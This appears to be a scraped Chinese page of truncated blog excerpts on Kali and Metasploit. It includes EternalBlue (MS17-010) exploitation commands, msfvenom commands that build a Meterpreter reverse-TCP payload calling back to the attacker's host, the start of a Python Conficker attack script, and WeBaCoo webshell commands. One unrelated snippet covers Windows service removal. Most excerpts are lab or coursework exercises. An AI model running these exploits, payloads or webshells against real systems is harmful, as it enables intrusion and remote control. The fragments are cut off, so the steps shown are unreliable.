1.开启postgresql数据库 2.msfconsole 进入MSF中 3.search 17-010 搜索cve17-010相关的exp auxiliary/scanner/smb/smb_ms17_010    扫描漏洞是否存在 exploit/windows/smb/ms17_010_eternalblue  用来攻击的exp 4.探测漏洞是否存在 use auxiliary/scanner/smb/smb_ms17_010 5.set rhosts 192.168.121.146  …
本文转自:https://www.cnblogs.com/yankaohaitaiwei/p/11556921.html 一.kali及Metasploit kali基于debin的数字取证系统,上面集成很多渗透测试工具,其前身是BT5 R3(BrackTrack),在信息搜集方面发挥很大作用. Metasploit是一个综合利用工具,极大提高了攻击者的渗透效率:使用Ruby开发:使用非常方便,进入该工具的方式:在终端输入msfconsole:MSF依赖于Postgresql数据库,在使用MSF…
猫宁!!! 参考: https://www.anquanke.com/post/id/86245 https://xz.aliyun.com/t/2536 https://www.cnblogs.com/backlion/p/9484949.html https://www.jianshu.com/p/91588e284fe8 “永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限,危害极大. 微软的漏洞2个漏洞公告 https://support.microsoft.com/zh-…
一.概念:Kali基于debin的数字取证系统,上面集成了很多渗透测试工具,其前身是BT5 R3(BtackTrack). 其中Metasploit是一个综合利用工具,极大的提高了攻击者的渗透效率,使用Ruby开发的,使用非常方便,进入该工具的方式:msfconsole ,MSF依赖于Postgresql数据库,在使用MSF之前要开启数据库. 二.步骤: Step1:生成木马,msfvenom msfvenom -p windows/meterpreter/reverse_tcp lhost=K…
我们首先利用 findTarget() 函数找到目标网段或目标主机中开放了445端口的主机,然后利用 confickerExploit() 函数将攻击代码写入 configure.rc 配置文件中,最后调用 MSF 框架读取配置文件进行攻击! # -*- coding: utf-8 -*- """ Created on Sun Nov 12 09:11:33 2018 @author: 小谢 """ import os import optpar…
Metasploit利用ms17_010(永恒之蓝) 利用流程 先确保目标靶机和kali处于同一网段,可以互相Ping通 目标靶机防火墙关闭,开启了445端口 输入search ms17_010 搜索永恒之蓝漏洞 use exploit/windows/smb/ms17_010_eternalblue 漏洞利用攻击 use 0 option 其中Required是yes的都要配置并且配置正确 Rhost是目标机的IP 设置成目标靶机的IP set rhosts 192.168.204.137 P…
卸载tomcat的时候服务用cmd运行不能删除 需要用管理员才能删除 手动删除Win7系统服务列表中残留服务的操作步骤分享给大家,在使用深度Win7系统过程中,将一些程序删除后,有些在服务列表中还会残留服务,此时可通过手动来删除,具体步骤如下: 1.按“Win+R”打开“运行”窗口,输入“services.msc”命令后打开服务管理. 2.右键MongoDB服务,系统会弹出无法启动MongoDB服务,错误提示“系统找不到指定的文件”. 3.使用sc命令来删除:在“运行”窗口中输入“CMD”,打开…
一.实验内容 1.使用kali进行靶机的漏洞扫描,利用metasploit选择其中的一个漏洞进行攻击,并获取权限. 2.分析攻击的原理以及获取了什么样的权限. 二.实验要求 1.熟悉kali原理和使用方法. 2.认真操作,详细记录实验过程和实验结果. 三.实验工具 笔记本电脑一台,安装parallels desktop虚拟机,安装kali和靶机系统windows10.另外安装了vmware虚拟机,安装kali和靶机系统windows2000. 四.实验步骤 (一)pd虚拟机下搭建渗透测试环境 1…
1 kali 基于debin的数字取证系统,上面集成了很多渗透测试工具,其前身是bt5r3(bractrack) 其中Metasploit是一个综合利用工具,极大提高攻击者渗透效率,使用ruby开发的,使用非常方便,进入该工具的方式:msfconsole,msf依赖与postgresql数据库,在使用msf之前要开启该数据库 step1:生成木马,msfvenom msfvenom -p windows/meterpreter/reverse_tcp lhost=kail的ip lport=55…
webacoo webshell其实就是放置在服务器上的一段代码 kali中生成webshell的工具 WeBaCoo(Web Backdoor Cookie) 特点及使用方法 类终端的shell 编码通信内容通过cookie头传输,隐蔽性强 cookie中传递数据使用的参数: cm:base64编码的命令 cn:服务器用于返回数据的cookie头的名 cp:返回信息定界符 生成服务端 Webacoo -g -o a.php 客户端连接 Webacoo -t -u http://x.x.x.x/…